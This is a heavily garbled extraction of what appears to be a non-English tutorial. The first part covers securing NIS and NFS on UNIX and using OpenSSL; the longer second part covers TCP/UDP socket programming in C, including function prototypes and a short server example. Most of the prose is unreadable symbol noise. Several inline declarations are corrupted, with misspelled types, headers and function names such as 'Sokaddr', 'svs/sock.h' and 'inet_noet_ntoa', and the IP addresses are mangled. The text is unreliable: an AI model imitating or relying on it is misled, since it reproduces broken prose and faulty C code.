. 6I W L3 J)$ DBM 6% ' E ? " b 1 - 5 S ˆK " ? 6 : 2 3 0 • C ' ,6 3 v 4$" E 0 5 -" /var/yp/securenets 4b 6 #P< ) U) a % ) ? 
+:*:0:0:::z • password map 4 NFS , # 4 ^P - -" F etc/exports % ' ? , U) " 6h @ " - Y • qualified domain names]fully_FQDN ) IP ,! 0_ < & z • - Y ypxfrd) ypserv 6 0 NFS ? , 5! # "] G - Y $ NFSBug ( 0, 5 " ? K , , #4 I5 ! I5 • #4 7 # l ' 0 5 $NFSBug " ? ' 0 5 - Y ftp://coast.cs.purdue.edu/pub/tools/unix/nfsbugh @ % ' : I 5 etc\exports % '" - Y • ),. T5! a " 25 ? )&' NFS % ' 4 U) mounting " 15G ? domain ( ^ 4 ? )&' NFS 6 G5 … ) IP h @ " U 4 home10.20.1.25(secure)a8Q0NFS -, ? )&' ? ^ l '7 B 5!0 S IP " U4_2< ) ?, 3 0 NFS % ' 6" E rw ) ? 5 export … ro]("c , 3 b' ( E etc\export % ' NFS -, U) 6" E domain ( ./ro)10.20.1.25 homeC 8Q ^ Domain ( ) IPh @ " , G root_squash superuser $, < -,< TG'l ' NFS -, 6 U ) ) 4 # H$ -, U) - Y NFS? , 0 ID nobody 4 "$ ?# 7 NFS -, U) user root S ) 0 … U) ID root ) 2, 0 2&N F , 6 * root ) 6% ' u root_squash/.)10.20.1.25 homeaC 8Q ? l '7 B 5!0 0 TG'7 4 y 4 % ! 4 NIS ) NFS 5 ?,< V8 " ? 59 ^P I 5 T) ' 6 • n 9" C ” ' " ) (_Rpc.nfsd] pq‹{ 7 4 )_portmap]www7 4 C 8Q] U) ) ( E ./etc/system % ' 1 line set nfssrv:nfs_portmon ? )&' a 67 $U c $ NIS)NFS ? , 6 U ) N" • ) X ?# 0 <( E " E ? , g 0SSH• I 25 % # ) 4 2 NFS" - Y W L3 ) • ("c 0 5 - Y http://www.math.ualberta.ca/imaging/snfsh @ " ? NIS ? , 6 U ) , # 4 ) SL Z )? , ^ ,1 b -,< K 6 @ 0 F 7 !89 " checklist UNIX h @ " ? $=! > 5 SL • 6patch * %K : $ NIS) 2 3@ ? 5 m .1 U# 0 5 - Y security d * K6 W L* deamons ) ("c N 4 0 5 MR/ , K ) / 9 NIS )NFS -, 6 U ) I 5 0, -, ) " NIS ) NFS? 5 TG' g• ^ 6 )]NFS ) NIS _?@ ) 6U ) ? Layer open secure sockets (SSl) ? )&' H I5 f ^ P N, # l 'f #4 " -, (E N ,G #P< n 9 " - Y 6 open source 7 L ]openSSl &'( $_ 2 K6 -, < 1P 7 !89 j &' ? ^P , 5 4@ -, 6 U ) SB g ? 5F 0, 5 " openldap,cups,maila I OpenSSl0 < , 6 3 a 5 - <? @ H$ l ' R 4 S @ ^ N H F 5 " - Y 0, < 2 ,G e G 5 openSSl - Y openSSL ,G $( * # 0, - Y - ?5F 0( openSSL 5 & , 5 ? 
$ openSSL M, 6" 0, 6 - Y openSSL 6 25F 6 #P < I 3 785/ $ : u 3 3 K O* " H a, 5 5/ I 5 ],< openssl " - Y $ 7 I N& H M, 6% - Y openSSl " 4@ -, 6 U ) ^ P $hhtps " 0, - " connectionn N& 3 <) 2 5 $ 0_‹‹s 7 4 ) * R4 S @ ^ $() $T) ? G - *1 , ,, e G % ! 6 F ) openSSL 0.9.7 * ?@ ) U 0 < ,6 3 1 ) U# HS @2 e G 6 " $ 6 F ?@ " %P H R4 S @ d * ,, e G $,< -,< SL ?@ " % H I 5 $ openSSl version " ? ) versipon 0.9.7a * : 2 0 5 - Y $-,< SL # 0 < ,6 3 &'( * H S @) - 5< " R4 SP @ : % a 4 " - 5 OpenSSL # 9 * 2 3@ 9 % ! %L 0 I5 "2 F 6 & openSSl -, 6 U ) ) • ?@ ) ' • ) ipfilter" $? # 7 K6 <- Y Z , 1 " $,< -,< SL % ! 0 5 SL T 5! DY/ I 5 2 , ,F ) 2 3@ -, 6@ DY/ - . $l ' R4 S @ : % $ openSSL * - . : ), . $, U7 $iR= 8 " 7 $ Socket Programming K &F ? G ) ( E % ! Unix % Q 6% ! ? , u 0 < F) M :G 2 @ TCP/IP – B #) 4 " 6‰ 9 b bP S L ) K ?@ - 56% ! h ?@ IP)TCP B #) 4 SB F Linux % ! - 4C c 5G 2 ?, Windows % 6 " 6N "@ H8! I R1 6b . %B .) 0 N C %Q @ , 6, b. u ,6 * U ) - ?) -, < = D U / 9 < b. # = G c • A 3 ) ) W 3 # ) #1 C5 6 2 ‰9 6Y . , U BT 6 K6, $n5! , GCC F 2< ? " c . K %L'2 , • ( Y ) #P< TCP/IP% # ) 4 i . e ' , 5 % <@ #P < . H 7 -J) 7 # G( 0,< e 'T/ % ' , 2< A) - 0, 5 %L'2 0 b. 4 b. 1Q ) 6 K 2 `56) ) Linux % ! 5 63 6C? " , , < 0, -,< 5F ,63 PE . ( Y2 . ( 6 ^P '#< ,P 1 " g@ : %L'2 0, #P < . Y( H ?@ ( Y , (5 I %L'2 c ,< 6 P" U# (5 % ! ) ,< \, 6 ) 4 2 - / y ?/ 9 b ? F T P) #P < 0 % ' 7 b B'" ) N4 , & (I/O) 6 F) 3 ) , 5 6Y ", - 6U# 5 <, < $, 3 @ T, • , < -, < ) )\ , )% % ' b. B 5F 2 5< , < ! ( 5 •0 < T, ) 7 @ L N4 # B % ! N N) (E " , T /2 ! )- 7 B 5! 3 , $2 k a, 6, (Read Only) < b' B'7 L ?@ , ( _ fopen() - <? ! % ' L* % ' , 56 N4 open() 7 % ! &@ _=1 ] 0, ' %P H B / " E _O 0, 2< 15G 7 0, ?56 , <T N4 $_ fwrite %PH B / " -,< " % '?) _ fclose() ? ! ˆ6 0 ) ) ("c 2 -, ! 2< close() 7 U 0 ,< ,6 * B / , j 5 .Y % '( , H 4" ] 0, , P % ' ( 5 " U4_ 256 < ( E , B 15! ) N4 * ? G N4 ", - # H- Y 0 , 5 T, % '? ! # ), , F) 3 ) =B* a, R " 6N B / ?@ " ?, 3 j 5 .Y 6N # U B 5! ( 5 ,6 3 M Y< ) - )? 
# @0 (5 H U# < b' B' N4 , 3 b' , 3 B'T < ) < ) , 3 < ) 7 , 3, F ,B B'- B'U# I/O \ L % ! a 6 5< $ , 3 B' * , 3 b' (con) I ) ) 6- & , < ) 3 = D) 2 0 < ' 2 _z ]% ' C H ,< 'G N4 b '$ 6- write() 15G k ) ", - % ! , ) % ' ' b. 6 ' R4 ? … B' N 4 … ? G j 5 .Y … B'T 7 4… ) GH ) % ' … ) GH ) % ' … 11b3 FIFO = … # 2 5< 26• T/ T, ) X ! % H , % ' F) 3 | ) ) 6 ) ?@ 2 7 !89 1P ) #P< ) ) ^P @ € , (I/O) ) ) 2 ^P - N@ 6, 5G #P< ^ P a •^ P • ] H ' 2 T 5G nP9 7 ) - 0, 2 N g ‰8: ), ?) " IP h @ ) _d * , , •^ P socket() 5 ˜4 g - < - <• &@ $, , $ &@ 0,< ,6 3 - Y - <? 6 ' ^P ' 7 3 ,G I ) #P < 6- , 6- 1P 7 B 5!_z , SB 9% ! 0, & , 3 ' 1P ( ,H [ 1P 7 , ? 1) ) + _O ?@ " 6- ' %5! P (Null) —14 5< % ', 56 ^ P ,< ( 5 + 7 4h @ 5< % ! 0, 5 " 6 6 '_d * %5! ? read() ] rece()) [ write() ] send() + _=1 ]W 3 ,6 3 ?56 $%P H B / 6 3 % ' - < 0, % ' " T) b < ,6* % ! ?@ ) W 3 & @ ' R4 % ' 3 3 ?@ " •" N •" - 62 " U4 ) TSAP : ) 2 7 !89 1P " ^ P ) 0 ,< ) ) ? " , /) % '2, #P < . 6 ) $, 3 6^ P 2 " 6 L* @" ? &56? B', 56CH < _% ' - < ] ) < " ) TG'^ P 2 , 0 (E - @" ? &56 : 1P @ " (, @ 6Y ) 0 , F) \ ) a ", P ! 'G \ ) 2 _0 , 0 < -, N1L \ 6 56 I " 56 1 ), 66 6 #5 \ \ 6* N \ ] 6 … 0 < 6 Y 2 7) Y $ \ -, TL ?), \ ) 2 ( Y2 &5 6 T A) 0, 6, ' 7 I 2t 5: ) S N` 6) 2t5: ! ( 6- 2 \ . ) P! ™Y/ , " $ (FTP) % 'T %# ) 4 TQ ? G 0, TCP A) ?56 (SMTP) # ) #1 6 T - \ " C GP 9) , 1P 15 / F) 6- 5> K6%# ) 4 ) 7 ,3 Q ? FS ! 2 `56) 6 (HTTP) 2 %# ) 4 6:3 ? FS c 6 6- 7 ! UDP ) TCP \ ^ P 0, < , -,< = G ( … ) j4 ) , \ , H I, 0 - ( 7 .Y T 62t 5: ^ P H %# ) 4 , " N56 0, " 13 ) S ! ) 6 TCP % # ) 4 0 H ) ^ P ˆ6 . %Q 6 H " $ 6- ?, " 3 A) 2 2 / 0 P CH B / \ # A) 5> 2 6" 78# (5 TL F) 6- )- ,6 3 ,6 3 (8! % ! + ) >' ,6 3 i: 6- " - Y % ! ^ P = G" 1P " UDP 0, S 6- 0, < ) $TL 2 5> L ) , 0 ,< & 1P " \ 1P 6- , #P < 6- P( DNS H- Y TCP 6% # ) 4 " - Y ) , ), < 1 ) 1P :3 0 UDP %# ) 4 ?), ) N 56 IP %# ) 4 ) , 5 +H ) ?@ 2 " c %P H CGP9 ) - ) 6- B # ) 4 TCP ,< - < C 8P H 6- < T T ! 5< / UDP 3 !& ( Y 3% 5 C 85! 
= G U TCP %# ) 4 7 K &F ?,< E $^ P H F ?), " | -, 6 U ) ( Y G ,< '9 ) 9P \) < I.1 " 6 F % H ^ P 2 ' 9 R 1$ < # ^P 6 ^P 2 0, < - 0 % ,6 3 = G (8! % ! š7 ^P 2 6- < #P < ) 4) 2 6- M 9) R4 ?# # 2 ^P C 85! 1P 3% 5 YB^ P -, \) < $2 '9 1P $^ P A R4 7 C, ! H • • 0 ' ,6 3 ( •-, 6 U ) 0 ^ P -, •_- \) < ?@ I ) ] a 0 2 7 !89 % 5 ) @) ), SB 9 , , " R4 R4 5! = G ) 4 Client c C ) 4 Server -, 6 U ) 3 !89 , /) $ X task , 5 I ) RN V < 7 !89 0,6, % . I $- 7 P! I T /2 ! - )- ? ) 3 F 3 O) -, 6 U ) O) 7 .Y S1H ) )- 5 < SL -, 6 U ) ?@ A" -, 4 " U4 )- 2< ' \) < -, 6 U ) H) TQ ? G !89 7 .Y 2 " 0, 5 T ) " 2* X X 2 ) 5 v 4 ("c -, 6 U ) ^P H B 1/ 2 P 5 X , 5 T I S v 4$X 0 7 !89 3 $" ) ,< ,G , 2< ;. , ) -,< +" 6 5 6 / 7) Y < ) N] 0 6 ^P % M 9 ,G 0, 6-, 6 U ) ,G C c 5G 2# 1 _0, ) N* 4 $7 !89 S/ , * H -, , T I Y , N I N M 9 – …-, 6 U ) 5 –, 5 T * 4)j N ;. 5 … 4 B F TQ T \X I : -, 6 U ) 0 5 3 ,6 3 7) Y $ < % $ a % ! b' \ % ! % ! , b. F $ 0, + b (5 2 0, 6, , -, 6^ P ? 6X A R4 I ' % <+ 6- ) >' , TCP ^ P Q ,/ , 6X 4 E " < A) 2 G Q ,/ ? G % ! ,< ( E bind() ) TCP TCP 5 6 6 $ " 5 ,< ,G B / _z 2 0, 5 \) < TCP ,< ,G ^ P A R 4 (8! , ' F )T ) -, < ' R4 ? &56 , " U# _O < (8! % ! b ^P ^P ,6 5< ( E listen() G ) " - Y -, 6 U ) , 3 + b ( UDP 4 - 5< UDP A (8! " / 4h @ , 3 , - 0, ,G 2 G C c 5G 0, < A" TCP ) < ) A R4 TCP 7 9P - / &1bind() 2#5 ? 3 2 _=1 = G, " 4h @ 7 5< L* 2 'G W 3 7 ,G #B 3 H ] 0, _0 ^P P 7 5 5 ( E Socket() 5 - 5 < ? <,L R4 ? G < ^P (8! % ! : 5< I -, 6 U ) 'G ( UDP 2 0, K5 ) # @ " %P H 2 `56) -, 6 U ) "7 B 5! 0 < 5 1 5 0, ) ( Y F T/ › (E B / 2 56 |-, 6 U ) 5 ,6 3 , " E ,! F N1 a K5 , 5 6X H 0, N ("c >' :, ,G 2 , 1 )$ 5< 0 7) Y ^ P 2 , T G') " 7 , L L $? &567 L , 7) Y B' , G " < -, 6 U ) ) 2, )@ 6" 7) Y ^ P 2, Q ,/ ,G % ' 0 < " ? &56 : 5< ? G 0,< b , < ] nB G 7 9P " , X " accept() + - Y % ! Y D 7 # accept() + 0, % >Y 'G 5< C _ _ F) 7 0,< ,6 3 0, K5 - Y 0 ,6 3 5 recv ) send 7 1P R4 ?# A) ) 2 0, 6, 5 3 _ close() + b ] ' _ shutdown() + b ] ' )T _- ^P C _) '9 ) ^ P +:H … 7 B 5! " # ':# +:H … a < T5! 
% ! b' E 0, ) F $ ^P 0, P 7 4h @ 3 U) ^P -, 6 U ) H , 56 -,< (8! ("c ,G B / , F) bind() " - Y X A 3 #B$ ? N " ^P connect() 5 ?@ 5 _=1 6^ P = G , " -, 6 U ) 5 L* _O )&1 G , 6, + " - Y X X I ?@ , ,< -, 6 0, TCP ^ P 0 H 9P 2 TCP 7 9P 5 _ Hand Shaking] B / ( E ) \) < 1 C 85! connect() R4 < 2 M 9 1 ),< 0 ( , H 6- H ' )T ' G 'X $ &@ ˆ 6?), , %/ $, < " bind() + " - Y ,6 * ("c TCP ^ P # ^ P -, Y < , 93 C,E 3 7 4 - 5< \) < ' connect() %5! ) -, 6 U ) 0, 5 0, 5 ( ,H 60, 5 +:H '9 '9 ) 7 ' T shutdown() send() ) recv() + close() + " _z ^P _ ?@ H) 5 -, 6 U ) " 5 6 1) ) + B 2 `56) 60 6, ("c ?5 3 6C _0 , ^P \ 6, \F u $ "= G `56) ?@ - N G H ) i. H 6- " g@ • L* •$- N \ 21 ) ) H- Y a,< L* $^ P = G C 8G'0 ?5 3 .$ ,! ` -, 2 $% ' - < , 56 ) 47 4h @ 3 ?@ G:H ( 5 ] 0 ?5 3 " 6 u " U4 H P " N1 H - " , A Int A; \ 2 ) ^ P M 9 2 < IPh @ 3 a "7 Struct Sokaddr { Unigned Shortsa_family ; /*address family AF_xxxx*/ Char sa_data[14] ; /*14 bytes of protocol address*/ }; 2 G & 2 / R 1œ ' , 6 3 \ , 6 #P< d* B #) 4 ) TCP/IP % # ) 4 N 0, #P< ;. 6 $ IP h @ $7 ) 7) Y 0 < 5 -,6 ! 5E 5 2G [ 3 - 3 & 2 Appletalk %Q ,6 3 7) Y 4h @" , B #) 4 8G'0, C AF_INET 0 N I %L'2 % d* 3 a sa-family … - ) ) ) #P< 7) Y 0 \ 2 a sa-data … - 6, B'2 c = G 1 ) ) )Y = G 1 ) B PH # T G CH a, N - < - *1 ( , Struct sockaddr_in { 'G ` 6" , 5< /*address family*/ Shortint_family ; Unsigned shortintsin_port ; /*port number*/ Structin addrsin_addr; /*internet address*/ Unsigned charsin_zero[8]; /*same size as struct Sockadda*/ #P< ), 2 G - 3 d* # I ) 8! ?), $i. d* ,! C 8 , 56a Sin_port … [ , ) ,B'2 a Sin_port … ) 47 4h @$ A 3 ,B'2 0, % 3 < AF_INET 0,< 0, 5 B P H 2 < IP h @ a In_addr … I , , b '$, < , 6 3 = G 0 Y , , B #) 4 8 C , 6 #P< ( 5 <= G , ( Y l'# IP h @ C 8G' h @ T 9 6 #P< " - 62 a Sin_zero [†] … 6 ?@ $,B'2 2 #P < N #P < Y C 5 memset() % Q G 9 F) % 1 0, < ) -,< - Y T G 7 0,< - Y % H #P < 3 1/ 6 ` , C5 / 1 ) 0 < $7) Y B #) 4(5 ) 7 4h @ " N62 'X 0 62 , 0 < " (, 6$+ 3 ' ? 
= G " - Y \ 5E ) , T G CH 1 ) N B P H ` F •\ n : • 0 ?@ 3 -,< = G in_addr ( N ) # () ,6 3 , 5 H # @ / () # = G 0 "7 /*Internet IP address (a strcture for historical reason)*/ Struction_addr { Usigned longs_addr ; l '7 IP h @ ?@ = G ) ?@ 9 0 2# 1) , B P H # T/ 6 - Y <) 5< - *1 I'/ 5< ,6 3 6 a < F - 3• 3 2 1 6,/) S < SL " LE \ " < 6 , - m.1" G < 78# _- < 7) Y <R -,< n' DE 7 H) R1 S E! 5 6, B' F) LE \ ) BE \ H #P < ) c , ,< - < ) , B'2 'G unsigned long 6" , 7 5B " I 1 ) 0,< , 6 3 'G ) % $, -, < = G c 7 %# ) 4 N TCP/IP S LE ) 3 < H) TQ ? ! 0 3 Struct sockaddr_inas ; As.sine_port=0 xb459 ; " U4 R1 H A" I _- P< CG:H )] 4 ?@ " ,G ) < - 3•T) A" 7 4 h @ TCP "7 ? ) 2 2' H a,< ,6 3 B4 59 ) + , 6, H 6, B'?) , 'G % 1 2 56 0,< a S ) X U htons() a BE 1/ htonl() a BE 1/ ntohl() a 2 < H) 2 ) 2< \ ? N #P <U ntohs() a 2 < H B G' 1/ BE " B G' 1/ BE " & ? ! " ) 7 5B % ,P + 7 5B % ,P + ) 7 5B % ,P + 7 5B % ,P + , , A SL " ) F- Y 6, B' 2< ? 3 ("c U LE 7 H " %PH C 5 /? 0, - Y l '+ IP TCP , I ,B'C < - Y l '+ sin_family , B' sock_addr_in ` -, < = G % ! l '+ " <@ l '+ ,B'2 ) " H) b'a R T Q? ! < I H ("c , B'2 6 , - Y < 6 3 [ AF_INET , R 1$, < ,6 * % 1Q #P < ) ) 0 5 - Y a 6, B' IP S1H @ < h @ ,B'?) IP h @ I 78# , IP •2 6h @ ;.P a, < < 6- pwwžwwžw‹qžw{p ,! IP h @ ,B' sock_addr_in ` IP 3 @O L F "+ ) 2 1/ 4 long \ " ,! < a ‹‹žwwžwpwžw†} ( ' , B' BE S1H < ,! % ,P R1l ' + 2 a inet_addro() + … U4 ) < h @ c TQ 0 h @ 7 L G ,6 B P H + % 5! U#! + 2 ainet_ntoa() + … (E IP h @ < ) struct in_addr \ " l '+ H 9 7 L ) ) 4 0, 5 a " TQ BE S1H @) ' % ,P $0 = G : < \ ?@ F) 3 printf (%s , inet_noet_ntoa (ina.sin_addr) ) ; k F) 3 ) - G ) : < 7 L h @ a "( ' . l 'TQ F) 3 C 8Q 0,< ,6 3 wqžŠžw‹wžwsq IP h @ www.ibm.com ( ' -" / )= ("c + G , ?@ " % P H0 @ % ,P N N @ * 6 3iX b. 0, < = G ^ P _ TCP P] -, 6 U ) H - Y + Socket() + a "7 + B( ' #include <sys/type.h> #include <sys/socket.h> intsocket ( intdomain,int type,int protocol ) ; - <C 8PH . I AF_inet 0 < \ , , , , (8! Type , B' ?@ , 3 -, 6 ? [ , $ ? 
6 *1 #P <U \ \ 0,< ( \ " H sock_stream ) 6, I ? I %# ) 4 0 #P< . ,6 56 H( #P< 6 ) T) 6, B' 0 –, G + ?@ " " R 1_% ' , 0 Ÿ + 2 N <- Y , ,N H , F) 3 C5 / , YD U + 256 F) 3 :3 - 5 < error " ? G 5 <) ,< , 6 3 'G + , , + :3 - 5< A" < 7 B 5! u ,< …w , socket() + Perror() 5 56 5 3^P ' %5! ,< …w socket() + , ) ) - P& @ , [ - < % Q C H ] ,< ,6 3 - Y 0 < =H ,6 3 ?56socket() + b L* L* a Protocol … < - 5< ,B'2 Y ?@ , [ I Sock_DGRAM 0, , ,< a type … 42 \ ? 6 *1 3( 4 2 a domain … 6 , 4 0,< H) - 5 ) , = G " + ) u ) 2 0 -, @ 1Q ?@ # A) 0, 6 a Bind() + ^P y b'5< bind() + 0 h @? -, P 0, 5 6 a, H (5 , ,6 - 5< , < "- 0, 5 = G 5 c 5G C •-,< " 7 4 ( c 5 / = G2 C U4 " Bind() + n 9 " W 3 7 4 - 5< ^ P http %# ) 4 TCP ) A" H) ˆ 6" 6 1 ), - j6 3 % ! †q 7 4 B . 2< % ! G -, 6 U ) 5 A 5< 1P B 5!• , ,6 5< G2 " ( E 6- F ) UDP TCP / < 6 4) 6X Y 2 `56 H) TQ ? G ( 5 $-, 6 U ) % .$ †q @ ,L " 7 L bind() + a 7 4 B( ' #include<svs/type.h> #include<svs/sock.h> int bind ( int soskfd , struct sockaddr_mv_addr , int addrlen ) 0, - " socket_] + " - Y 0, 6, B . P " h @ L* -,< " 5< , 6 3 < IPh @ ) 7 4 h @ $ - 3 % ! @)- - N@ O* 0 S / =:1" 13 @ < I Y ' L - 5< My_Addr ` - < , 7 $ •ŠŠsŠ 5< F) 4 h @ , B' 2 3 0 3 T 9 a Addr_len … # Bind_] + U# wqp‹ - 5< " 7 4 0, / a My_Addr … ` 0,< = G C 8P H ` a ?56a sockfd … 8P C H I b . _= 1 @2 - 5< ? ! 2 , < wqps -, < ) " # Y 2 6-, 6 U ) 0 ,6 * ? ?@ )z * ) 4 , P 5< , _O 6-, 6 U ) 6 I INADDR_ANY $, , & 4 - 5< 4 2 " -" F % ! IP h @ , B' [ , IP h @ 5< B . 2< ) U# 37 b. % ! 0 c 6, B' 6 ?@ , % ,P BE 1/ 1/ Y , 1/ ) , Y N- 3 ?@ ?@ HTONS_] + , ) 6a - ) " 3 5 <" % P H " ' Bind_] % 5! - N@ , < u $ :3 \ A" 0, 4 , # ("c 2 " 4 5< ?@ 5< G , % ,P 3 ,6 3 " H #_ O* Bind_] 0 ,6 3 - ?@ % 1 0,< N - N@ 2#5 0 - _z …w , _- G ,< ) - P& @ PEAAOR_] + ) :3 - 5< Errno :3 7 L* a Listen_]+ (8! - ^P % ! + 2 b TCP ^ P 6X 0 ), 7 P! _+ N I )- = I.1 $-, 6 U ) , 6, 7 4h @ + b 0,6, G] , G ? I R H 6U) ) " ) T G'7 9P @" = a "7 % ! , (8! 
) - < 7 4 - 5< H X , Q ,/ @)- 5 ,G Q,/ 6X I.12 " ", - " U4 TCP ^ P @^P )$ b'+ 2 TCP ^ P 0 F? " 2, A) G -, 6 U ) 2#5 ? " 6 9 F 7) Y ) 4 , , , % ! 2 H B / # < (8! % ! + #@ , Listen_] B ( '0,< W 3 7 4 - 5< Int listen (int sockfd , int back log ) ; 0, - E ?@ , L* ?56a Sockfd … 5 " 0 I -, < = 0 erno u ) ,G Q ,/ a Backlog … ) nB G 7 9P , 6 3 …w+ 2 , backlog , -,< ),. pq :3 ") 7 B P H+ 0,< - ,3 , 56 :3 - 5< Accept + a < H ?@ ( Y - < ) _] + ) 4 TCP ^ P 6 H) 0 < 2 " , M 9 7 B 5! , PB : + b % ! >/ / @)L* T) L* F accept accept() 0,< 0,6, % 1 2 56 ,6, ( E 5< E () L* nB G 7 9P " I -,< = - Y nB G 7 9P " 7 9P % -,< = ("c 0, , accept() ) -, @ 2 7) Y 0 # A R4 T) L* 2 ) 7 !89 T 0,< 6X 2 € - Y ] ) # -,< = , ,F accept() + , " U4 < O* % ! 0, , + 2 $ ' R4 _ F) 7 # nB G 7 9P 2 " , , ,F 5< " ,< F listen_] + X " 5< ) 4 7 L* @)- I < - N nB G ) -,< = X % .% ), ) ' 7 9P " " _=1 / () " _O # L* a 0, 2 0, "7 + B( ' #include <sys/socket.h> int accept ( int sockfd , void*addr , *addrlen ) ; 0 T Socket _] + -, @ + 2 M 9 IP h @ ) 7 4? ! 2 L* @ 5< 4 h @ nB G^P 0,< 'G C 8P H # , 3 - < a Addr … ` A R4 " U4 % ! 
0, 5< S / addr a Sockfd … ?@ ` , ^P % T 9 a Addrlen … H- Y u ,G 1) :3 ?@ - 5 < a L* - Ÿ + 2 , :3 , < _…w] , 0 % H errno ,6 3 , B ?,< 2<) 0 "(5 TQ

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define MYPORT 3490   /* the port users will be connecting to */
#define BACKLOG 10    /* how many pending connections the queue will hold */

int main(void)
{
    int sockfd, new_fd;              /* listen on sockfd, new connection on new_fd */
    struct sockaddr_in my_addr;      /* my address information */
    struct sockaddr_in their_addr;   /* connector's address information */
    socklen_t sin_size;

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
        my_addr.sin_family = AF_INET;          /* host byte order */
        my_addr.sin_port = htons(MYPORT);      /* short, network byte order */
        my_addr.sin_addr.s_addr = INADDR_ANY;  /* auto-fill with my IP */
        memset(&(my_addr.sin_zero), 0, 8);     /* zero the rest of the struct */
        if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) != -1) {
            listen(sockfd, BACKLOG);
            sin_size = sizeof(struct sockaddr_in);
            new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
        }
    }
    return 0;
}

, ,F " 60, ' - Y $ T , N accept()+ b N ?@ L * recv()) send() + )- - Y % H 5 a ) -, 6 U ) "7 + ) 5 + ) 2 B ( '0, 6- 1P

int send(int sockfd, const void *msg, int len, int flags);
int recv(int sockfd, void *buf, int len, unsigned int flags);

0 -,< z * E@ " accept() + " -, @ 1 60, < _ ` T 0 Y ?@ b' 6 B . a Msg … @ %Q] I'/ H TCP ) ' S / ' 2 ;. 5 iX a Sockfd … L* " - 1 ,B'?) ) T 9 a Len … 6- a Flag … , `4 " & 6 4 0, RN ' 6- B . h @ recv() + I'/ 0 7 1 ) 0, , 6 3 …w :3 d* X S / len u 6") ' ,G -, " ) ' 7 1 ' 4 2 a Buf … H E@ + ) 2 6 , ,G $ PQ ,! 1 ,G 2#5 , H 0,<P? # , + , H wqqq , len 1 ), - ] 1 6- % " †qq 7 0, d * 5< , 2 @=B # , send() + b T /, # T u 6- e 'TQ ? ! 0, < pqq 5< -, -, E/ , H _ ' G B / 6 a 0,< \ ? 6- 6 ) A /) b 'recv() ) send() + a # ' )T ) UDP A) ( B , 63 1 ) œ, P , , T shutdown()) close() + , 5 ' T - 0, , P ) < N" ^P , ^P ,< M 9 ? " , , < " " ? " 6 B', 562# 1 ) a close()+ "7 B( '

int close(int sockfd);

+ L* + b ,< ? 56 sockdf L* 0,< ,6 3 - Y % H ' 2 0 I & )T a Socfd … L* , H 0 accept() -, socket() I ) nB G 7 9P ( 5 N close() + b < 9P 0 % !
7 9P = a TCP 7 9P " ), A" 4 $- # TP H / ,,P N ^P - X 6 ?@ F , 0, 'X nB G ?@ B ( ' ,<P shutdown() + "7 ,6 * 2 N - Int shutdown (int sockdf, int how); 0 I a " ? `56$- R4 " , T 1 ) " 0, 6- "@ ' "@ 8 C g - ' a Y ) ) '% ! 2#5 g - 2#5 g ' , 6 3 …w + 2 , 0, _TCP %# ) 4 . a, -, 6 U ) H- Y 5 , G A" :3 ") 4 0 aw , … 0 " ? `56 )T ap , … %5! close() + 0, 5 u ) , … T F) 3 ' % ! - A) a How … 2 ^ " ^ , 56 1/ 2 0 < # 2#5 ?@ 1/ 0, " a Sockfd … L* 7 B P H+ , 56 :3 - 5< errno P] - Y 4+ , , < 'G 5 P, + G T/ 0, < E - Y + " # 0, ) + 2 F) -, 6 U ) ) Yˆ 6 E 0, Y -, 6 U ) < 5 connect() + b (E , F) 5 - Y 6- ^P H %5! 2 < ' R4 X ' 0, , Pshutdown () socked_] X -, 6 U ) C 5 " 2 0,< ,6 3 0, CH , _=1 - Y ,< 'G B P H j* 0 ?@ ) , , ( N6 _O , < I ,H iX recv() ) send() + )T close () + b 5 " _z -,< E ^ P C _ connect + ) < listen () + 0 connect () + " -, 6 U ) - Y ) ,< -,< F I ,6 3 & @ ' + 2< ^P ) -, 6 U ) E - N@ , < -,< a H accept () ) 3 ' connect () + "7 B( ' #include <sys/types.h> #include <sys/socket.h> int connect (int socket, struct sockadr* serv_ addr, int addrleny); 0 Socket() + -, @ ` 2 3 ' Sockdf \ " 0, < 'G C 8PH 0,< ,6 3 2 G ,L / ? ), #B, - 5 <2 %L , ? ! h @% 5< 5 S / I ), 0, ? O* 5< -, 6 U ) / (8! % ` a Serv_addr … 0 2< IP h @ -" , : Addrlen … B P H ` H sizeof(struct sockaddr) -, 6 U ) 4 h @ ? 56 a SOCKDF … 7 4 h @ ) ,L 'G 0 % ! L* 3 7 4 h @ 5< 5< , 42 H # 2 ' L 7 4 - 5< H) v 4 , 8 C R4 X 3 9 5 2 -, 6 U ) ), < - O* % ! ,6 3 M 9 & 3 7 4 h @ $^ P -, \) < ^P , ,< d * ) [, C G:H -, 6 U ) 7 4 0, 5 \) < , 6 3 …w + 2 TCP ^ P , 0,< H - :3 - 5< errno Ÿ UDP A) a( , , (E ( T /0 \ A R4 ) ) UDP A) \ ' (,! 7 ' u ) ' ' )T )T $T + ? 7 0 -, 6 U ) socket () + 4 3 ' 2 0, E ( 5 … \ " _=1 0 < ( E SOCK_DGAM _ bind() + ' - ]0, 6, GH h @] š ,P P ]0, ? I 6- 7 4 h @ -,< E ' I , 'X h @ ,< A" 4) ' - 0 ,6 3 R4 ?# T 0 < ( E sendto()) recvfrom()+ B _O ˆ 6?), _z H) _,6 5 ( GT ) -,< d * _7 4 )IP \ ' 0, , P )T -,< E C _ 5 4 ) socket 4) socket() + ] 0, E ( … \ " _=1 _ SOCK_ DGRAM] 0, 5 T -, 6 U ) , 6, 5 )T 5 G 6- 0, 5 T ? 
6' - $, < # <, N , 'X 1 ˆ6?), ,< " -, 6 U ) " 0, , P "7 ( 5 P- 5< " ' -,< E T 6_O # H) -, < 3 < -, 6 U ) 0, 6, ( E a - + _z B( ' Int send to (int sockfd, connect void* msg, int len, unsigled int flags, const struct_to, int tolen); 0 z * F socket() + -, @ E@ " 1 6- ( 2 0 -, 6 U ) Y d* 3 7 ?@ H UDP ) ' 0 0, N I H %. h @ a Msg … I'/ ( 4 2 ' 0 <T S / ?@ C 8G'$;. ?) 4 - 5 < 2 `56) , L a Flags … , ` 4 " &6 4 2< a TO … ` IP h @ , ^ ) -,< ( 4 T 9 a Len … 1 Sockaddr \ " 8PH C a sockfd … L* ` 0 < I size , sockaddr ` ?@ , I of (struct sockaddr) 0 T ,G send() + , 56+ 2 n' % ! , , 2 :3 , < _…w] # -,< T 6 T , ,G , 6X , errno # 6" 0, 5 0,< B / ") B1 T 9 a Tolen … H 0 u @T 2 `56) - "7 -,< ?@ 